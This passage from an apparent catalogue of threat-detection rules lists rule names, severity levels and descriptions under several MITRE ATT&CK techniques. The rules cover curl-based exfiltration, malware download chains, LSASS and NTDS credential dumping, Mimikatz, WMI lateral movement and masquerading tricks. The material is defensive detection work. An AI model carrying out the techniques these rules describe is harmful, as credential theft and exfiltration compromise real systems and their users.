    Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
  • Pandemic Registry Key - Level: critical
    Description: Detects Pandemic Windows Implant
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download - Level: high
    Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process - Level: medium
    Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
  • Network Connection Initiated From Users\Public Folder - Level: medium
    Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. Use this rule to hunt for potential suspicious or uncommon activity in your environement.
  • File Download Via Curl.EXE - Level: medium
    Description: Detects file download using curl.exe
  • Curl.EXE Execution - Level: low
    Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
  • Potential Data Exfiltration Via Curl.EXE - Level: medium
    Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
attack.t1078 63
Show Rules (63)
  • Kubernetes Admission Controller Modification - Level: medium
    Description: Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
  • OpenCanary - SSH Login Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
  • OpenCanary - SSH New Connection Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
  • OpenCanary - Telnet Login Attempt - Level: high
    Description: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure - Level: high
    Description: Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
  • AWS Key Pair Import Activity - Level: medium
    Description: Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
  • User Added to an Administrator's Azure AD Role - Level: medium
    Description: User Added to an Administrator's Azure AD Role
  • Azure Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Account Created And Deleted Within A Close Time Frame - Level: high
    Description: Detects when an account was created and deleted in a short period of time.
  • Guest Users Invited To Tenant By Non Approved Inviters - Level: medium
    Description: Detects guest users being invited to tenant by non-approved inviters
  • Azure Domain Federation Settings Modified - Level: medium
    Description: Identifies when an user or application modified the federation settings on the domain.
  • PIM Alert Setting Changes To Disabled - Level: high
    Description: Detects when PIM alerts are set to disabled.
  • Azure Subscription Permission Elevation Via AuditLogs - Level: high
    Description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
  • Activity From Anonymous IP Address - Level: high
    Description: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
  • Atypical Travel - Level: high
    Description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
  • Impossible Travel - Level: high
    Description: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
  • Suspicious Browser Activity - Level: high
    Description: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
  • Azure AD Threat Intelligence - Level: high
    Description: Indicates user activity that is unusual for the user or consistent with known attack patterns.
  • New Country - Level: high
    Description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
  • Unfamiliar Sign-In Properties - Level: high
    Description: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
  • Stale Accounts In A Privileged Role - Level: high
    Description: Identifies when an account hasn't signed in during the past n number of days.
  • Invalid PIM License - Level: high
    Description: Identifies when an organization doesn't have the proper license for PIM and is out of compliance.
  • Roles Assigned Outside PIM - Level: high
    Description: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.
  • Roles Activation Doesn't Require MFA - Level: high
    Description: Identifies when a privilege role can be activated without performing mfa.
  • Roles Activated Too Frequently - Level: high
    Description: Identifies when the same privilege role has multiple activations by the same user.
  • Roles Are Not Being Used - Level: high
    Description: Identifies when a user has been assigned a privilege role and are not using that role.
  • Too Many Global Admins - Level: high
    Description: Identifies an event where there are there are too many accounts assigned the Global Administrator role.
  • Increased Failed Authentications Of Any Type - Level: medium
    Description: Detects when sign-ins increased by 10% or greater.
  • Measurable Increase Of Successful Authentications - Level: low
    Description: Detects when successful sign-ins increased by 10% or greater.
  • Authentications To Important Apps Using Single Factor Authentication - Level: medium
    Description: Detect when authentications to important application(s) only required single-factor authentication
  • Suspicious SignIns From A Non Registered Device - Level: high
    Description: Detects risky authentication from a non AD registered device without MFA being required.
  • Application Using Device Code Authentication Flow - Level: medium
    Description: Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
  • Applications That Are Using ROPC Authentication Flow - Level: medium
    Description: Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
  • Azure Unusual Authentication Interruption - Level: medium
    Description: Detects when there is a interruption in the authentication process.
  • Google Cloud Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Azure Login Bypassing Conditional Access Policies - Level: high
    Description: Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.
  • Microsoft 365 - Impossible Travel Activity - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.
  • Logon from a Risky IP Address - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.
  • Root Account Enable Via Dsenableroot - Level: medium
    Description: Detects attempts to enable the root account via "dsenableroot"
  • Guest Account Enabled Via Sysadminctl - Level: low
    Description: Detects attempts to enable the guest account using the sysadminctl utility
  • Cisco BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
  • Cisco LDP Authentication Failures - Level: low
    Description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
  • Huawei BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
  • Juniper BGP Missing MD5 - Level: low
    Description: Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
  • Win Susp Computer Name Containing Samtheadmin - Level: critical
    Description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
  • Account Tampering - Suspicious Failed Logon Reasons - Level: medium
    Description: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
  • Suspicious Remote Logon with Explicit Credentials - Level: medium
    Description: Detects suspicious processes logging on with explicit credentials
  • User Added to Local Administrator Group - Level: medium
    Description: Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
  • External Remote RDP Logon from Public IP - Level: medium
    Description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
  • External Remote SMB Logon from Public IP - Level: high
    Description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
  • Failed Logon From Public IP - Level: medium
    Description: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
  • Suspicious Computer Machine Password by PowerShell - Level: medium
    Description: The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.
  • Password Provided In Command Line Of Net.EXE - Level: medium
    Description: Detects a when net.exe is called with a password in the command line
  • Account Created And Deleted By Non Approved Users - Level: medium
    Description: Detects accounts that are created or deleted by non-approved users.
  • Authentication Occuring Outside Normal Business Hours - Level: low
    Description: Detects user signs ins outside of normal business hours.
  • Privilege Role Elevation Not Occuring on SAW or PAW - Level: high
    Description: Detects failed sign-in from a PAW or SAW device
  • Privilege Role Sign-In Outside Expected Controls - Level: high
    Description: Detects failed sign-in due to user not meeting expected controls for adminitrators
  • Privilege Role Sign-In Outside Of Normal Hours - Level: high
    Description: Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated
  • Interactive Logon to Server Systems - Level: medium
    Description: Detects interactive console logons to Server Systems
  • AWS Lambda Function Created or Invoked - Level: low
    Description: Detects when an user creates or invokes a lambda function.
  • Failed Logins with Different Accounts from Single Source System - Level: medium
    Description: Detects suspicious failed logins with different user accounts from a single source system
  • Failed NTLM Logins with Different Accounts from Single Source System - Level: medium
    Description: Detects suspicious failed logins with different user accounts from a single source system
attack.t1047 54
Show Rules (54)
  • Windows Management Instrumentation DLL Loaded Via Microsoft Word - Level: informational
    Description: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands
  • New Lolbin Process by Office Applications - Level: high
    Description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
  • Excel Proxy Executing Regsvr32 With Payload - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
  • Excel Proxy Executing Regsvr32 With Payload Alternate - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
  • Office Applications Spawning Wmi Cli Alternate - Level: high
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • Suspicious Cmd Execution via WMI - Level: medium
    Description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.
  • WMI Execution Via Office Process - Level: medium
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • WMI Remote Command Execution - Level: medium
    Description: An adversary might use WMI to execute commands on a remote system
  • WMI Reconnaissance List Remote Services - Level: medium
    Description: An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
  • Remote DCOM/WMI Lateral Movement - Level: high
    Description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
  • MITRE BZAR Indicators for Execution - Level: medium
    Description: Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
  • T1047 Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
  • Successful Account Login Via WMI - Level: low
    Description: Detects successful logon attempts performed with WMI
  • PSExec and WMI Process Creations Block - Level: high
    Description: Detects blocking of process creations originating from PSExec and WMI commands
  • Wmiexec Default Output File - Level: critical
    Description: Detects the creation of the default output filename used by the wmiexec tool
  • Wmiprvse Wbemcomn DLL Hijack - File - Level: critical
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • WMI Event Consumer Created Named Pipe - Level: medium
    Description: Detects the WMI Event Consumer service scrcons.exe creating a named pipe
  • WMImplant Hack Tool - Level: high
    Description: Detects parameters used by WMImplant
  • WMIC Unquoted Services Path Lookup - PowerShell - Level: medium
    Description: Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - Potential Impacket Lateral Movement Activity - Level: high
    Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
  • Suspicious Microsoft Office Child Process - Level: high
    Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
  • Script Event Consumer Spawning Process - Level: high
    Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
  • New Process Created Via Wmic.EXE - Level: medium
    Description: Detects new process creation using WMIC via the "process call create" flag
  • Computer System Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
  • Hardware Model Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
  • Windows Hotfix Updates Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
  • Process Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
  • Potential Product Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
  • Potential Product Class Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
  • Service Reconnaissance Via Wmic.EXE - Level: medium
    Description: An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
  • Potential Unquoted Service Path Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
  • System Disk And Volume Reconnaissance Via Wmic.EXE - Level: medium
    Description: An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
  • WMIC Remote Command Execution - Level: medium
    Description: Detects the execution of WMIC to query information on a remote system
  • Service Started/Stopped Via Wmic.EXE - Level: medium
    Description: Detects usage of wmic to start or stop a service
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • Suspicious WMIC Execution Via Office Process - Level: high
    Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
  • Suspicious Process Created Via Wmic.EXE - Level: high
    Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
  • Application Terminated Via Wmic.EXE - Level: medium
    Description: Detects calls to the "terminate" function via wmic in order to kill an application
  • Application Removed Via Wmic.EXE - Level: medium
    Description: Detects the removal or uninstallation of an application via "Wmic.EXE".
  • WmiPrvSE Spawned A Process - Level: medium
    Description: Detects WmiPrvSE spawning a process
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell - Level: medium
    Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
  • Suspicious WmiPrvSE Child Process - Level: high
    Description: Detects suspicious and uncommon child processes of WmiPrvSE
  • Blue Mockingbird - Registry - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • Suspicious Encoded Scripts in a WMI Consumer - Level: high
    Description: Detects suspicious encoded payloads in WMI Event Consumers
  • Blue Mockingbird - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • UNC2452 PowerShell Pattern - Level: critical
    Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  • WMI Module Loaded By Uncommon Process - Level: low
    Description: Detects WMI modules being loaded by an uncommon process
  • File Creation by Office Applications - Level: high
    Description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
attack.t1036 42
Show Rules (42)
  • Process Memory Dumped Via RdrLeakDiag.EXE - Level: high
    Description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
  • Potentially Suspicious Execution From Tmp Folder - Level: high
    Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
  • Interactive Bash Suspicious Children - Level: medium
    Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
  • New or Renamed User Account with '$' Character - Level: medium
    Description: Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.
  • Password Protected ZIP File Opened (Suspicious Filenames) - Level: high
    Description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
  • Windows Binaries Write Suspicious Extensions - Level: high
    Description: Detects Windows executables that write files with suspicious extensions
  • Potential Homoglyph Attack Using Lookalike Characters in Filename - Level: medium
    Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • System Control Panel Item Loaded From Uncommon Location - Level: medium
    Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
  • Suspicious Calculator Usage - Level: high
    Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
  • Suspicious CodePage Switch Via CHCP - Level: medium
    Description: Detects a code page switch in command line or batch scripts to a rare language
  • CreateDump Process Dump - Level: high
    Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
  • DumpMinitool Execution - Level: medium
    Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
  • Suspicious DumpMinitool Execution - Level: high
    Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
  • Explorer Process Tree Break - Level: medium
    Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
  • Findstr Launching .lnk File - Level: medium
    Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
  • Forfiles.EXE Child Process Masquerading - Level: high
    Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
  • HackTool - XORDump Execution - Level: high
    Description: Detects suspicious use of XORDump process memory dumping utility
  • Potential Fake Instance Of Hxtsr.EXE Executed - Level: medium
    Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
  • CodePage Modification Via MODE.COM To Russian Language - Level: medium
    Description: Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.
  • Suspicious MSDT Parent Process - Level: high
    Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
  • Renamed CreateDump Utility Execution - Level: high
    Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed Plink Execution - Level: high
    Description: Detects the execution of a renamed version of the Plink binary
  • Process Memory Dump Via Comsvcs.DLL - Level: high
    Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
  • Suspicious Process Start Locations - Level: medium
    Description: Detects suspicious process run from unusual locations
  • Sdiagnhost Calling Suspicious Child Process - Level: high
    Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
  • Potential Command Line Path Traversal Evasion Attempt - Level: medium
    Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
  • Process Execution From A Potentially Suspicious Folder - Level: high
    Description: Detects a potentially suspicious execution from an uncommon folder.
  • Potential Homoglyph Attack Using Lookalike Characters - Level: medium
    Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • Suspicious Process Parents - Level: high
    Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
  • System File Execution Location Anomaly - Level: high
    Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
  • Procdump Execution - Level: medium
    Description: Detects usage of the SysInternals Procdump utility
  • Potential SysInternals ProcDump Evasion - Level: high
    Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
  • Potential LSASS Process Dump Via Procdump - Level: high
    Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
  • Taskmgr as LOCAL_SYSTEM - Level: high
    Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
  • New Process Created Via Taskmgr.EXE - Level: low
    Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
  • Potential ReflectDebugger Content Execution Via WerFault.EXE - Level: medium
    Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
  • Suspicious Child Process Of Wermgr.EXE - Level: high
    Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
  • Suspicious Windows Update Agent Empty Cmdline - Level: high
    Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
  • CodePage Modification Via MODE.COM - Level: low
    Description: Detects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.
attack.t1003 40
Show Rules (40)
  • Mimikatz MemSSP Default Log File Creation - Level: critical
    Description: Detects Mimikatz MemSSP default log file creation
  • Credential Acquisition via Registry Hive Dumping - Level: high
    Description: Detects Credential Acquisition via Registry Hive Dumping
  • Mimikatz Detection LSASS Access - Level: high
    Description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
  • Activity Related to NTDS.dit Domain Hash Retrieval - Level: high
    Description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
  • OpenCanary - MSSQL Login Attempt Via SQLAuth - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
  • OpenCanary - MySQL Login Attempt - Level: high
    Description: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.
  • OpenCanary - REDIS Action Command Attempt - Level: high
    Description: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Rare Subscription-level Operations In Azure - Level: medium
    Description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.
  • Linux Keylogging with Pam.d - Level: high
    Description: Detect attempt to enable auditing of TTY input
  • WCE wceaux.dll Access - Level: critical
    Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
  • Credential Manager Access By Uncommon Applications - Level: medium
    Description: Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
  • Access To Crypto Currency Wallets By Uncommon Applications - Level: medium
    Description: Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump - Level: high
    Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
  • HackTool - Rubeus Execution - ScriptBlock - Level: high
    Description: Detects the execution of the hacktool Rubeus using specific command line flags
  • Live Memory Dump Using Powershell - Level: high
    Description: Detects usage of a PowerShell command to dump the live memory of a Windows machine
  • Potential Invoke-Mimikatz PowerShell Script - Level: high
    Description: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.
  • Esentutl Gather Credentials - Level: medium
    Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
  • Hacktool Execution - Imphash - Level: critical
    Description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
  • Hacktool Execution - PE Metadata - Level: high
    Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
  • HackTool - Rubeus Execution - Level: critical
    Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
  • Microsoft IIS Service Account Password Dumped - Level: high
    Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
  • Microsoft IIS Connection Strings Decryption - Level: high
    Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
  • Potential Credential Dumping Via LSASS Process Clone - Level: critical
    Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
  • Potential Credential Dumping Attempt Using New NetworkProvider - CLI - Level: high
    Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
  • Suspicious Reg Add Open Command - Level: medium
    Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
  • Capture Credentials with Rpcping.exe - Level: medium
    Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
  • Interesting Service Enumeration Via Sc.EXE - Level: low
    Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
  • Shadow Copies Creation Using Operating Systems Utilities - Level: medium
    Description: Shadow Copies creation using operating systems utilities, possible credential access
  • Suspicious SYSTEM User Process Creation - Level: high
    Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
  • Loaded Module Enumeration Via Tasklist.EXE - Level: medium
